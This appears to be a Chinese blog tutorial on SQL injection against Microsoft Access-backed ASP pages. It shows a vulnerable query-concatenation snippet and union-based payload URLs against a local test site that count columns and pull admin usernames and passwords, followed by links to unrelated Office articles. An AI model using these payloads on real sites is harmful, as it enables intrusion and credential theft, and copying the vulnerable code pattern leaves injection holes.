Access安全防範(fàn)-SQL 註入
- 2017-09-06 08:00:00
- zstmtony 原創(chuàng)
- 4386
SQL註入之access
access三大攻擊手法
1.access註入攻擊片段-聯(lián)閤查詢法
2.access註入攻擊片段-逐字猜解法
3.工具類的使用註入
Sql註入産生條件
1.必鬚有蔘數(shù)傳遞
2.蔘數(shù)值帶入數(shù)據(jù)庫查詢併執(zhí)行
Access註入是暴力猜解
Access數(shù)據(jù)結(jié)構(gòu)(access隻有一箇數(shù)據(jù)庫)
Access數(shù)據(jù)庫
錶名
列名
數(shù)據(jù)
該頁麵asp的sql語句
<%
id=request("id")
sql="select * from product where id="&id
set rs=conn.execute(sql)
%>
1.access註入攻擊片段-聯(lián)閤查詢法(union)
判斷註入
猜解錶名
猜解列名
猜解數(shù)據(jù)
Order by 22 22 代錶查詢的列名的數(shù)目有22箇
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 錯(cuò)誤
猜解錶名 確定存在admin錶名
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
猜解列名 猜解數(shù)據(jù)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
錶名和列名猜解成功率不是百分百,猜解不到解決辦法?
1.字典文件收集(社工)
2.Access偏移註入
- office課程播放地址及課程明細(xì)
- Excel Word PPT Access VBA等Office技巧學(xué)習(xí)平颱
- 將( .accdb) 文件格式數(shù)據(jù)庫轉(zhuǎn)換爲(wèi)早期版本(.mdb)的文件格式
- 將早期的數(shù)據(jù)庫文件格式(.mdb)轉(zhuǎn)換爲(wèi) (.accdb) 文件格式
- KB5002984:配置 Jet Red Database Engine 數(shù)據(jù)庫引擎和訪問連接引擎以阻止對遠(yuǎn)程數(shù)據(jù)庫的訪問(remote table)
- Access 365 /Access 2019 數(shù)據(jù)庫中哪些函數(shù)功能和屬性被沙箱模式阻止(如未啟動(dòng)宏時(shí))
- Access Runtime(運(yùn)行時(shí))最全的下載(2007 2010 2013 2016 2019 Access 365)
- Activex控件或Dll 在某些電腦無法正常註冊的解決辦法(regsvr32註冊時(shí)卡?。?/a>
- office使用部分控件時(shí)提示“您沒有使用該ActiveX控件許可的問題”的解決方法
- RTF文件(富文本格式)的一些解析
- Access樹控件(treeview) 64位Office下齣現(xiàn)橫曏滾動(dòng)條不會(huì)自動(dòng)定位的解決辦法
- Access中國樹控件 在win10電腦 節(jié)點(diǎn)行間距太小的解決辦法
- EXCEL 2019 64位版(Office 2019 64位)早就支持64位Treeview 樹控件 ListView列錶等64位MSCOMMCTL.OCX控件下載
- VBA或VB6調(diào)用WebService(直接Post方式)併解析返迴的XML
- 早期PB程序連接Sqlserver齣現(xiàn)錯(cuò)誤
- MMC 不能打開文件C:/Program Files/Microsoft SQL Server/80/Tools/Binn/SQL Server Enterprise Manager.MSC 可能是由於文件不存在,不是一箇MMC控製颱,或者用後來的MMC版
- sql server連接不瞭的解決辦法
- localhost與127.0.0.1區(qū)彆
- Roych的淺談數(shù)據(jù)庫開髮繫列(Sql Server)
- sqlserver 自動(dòng)備份對備份目録沒有存取權(quán)限的解決辦法
- 安裝Sql server 2005 express 和SQLServer2005 Express版企業(yè)管理器 SQLServer2005_SSMSEE
聯(lián)繫人: | 王先生 |
---|---|
Email: | 18449932@qq.com |
QQ: | 18449932 |
微博: | officecn01 |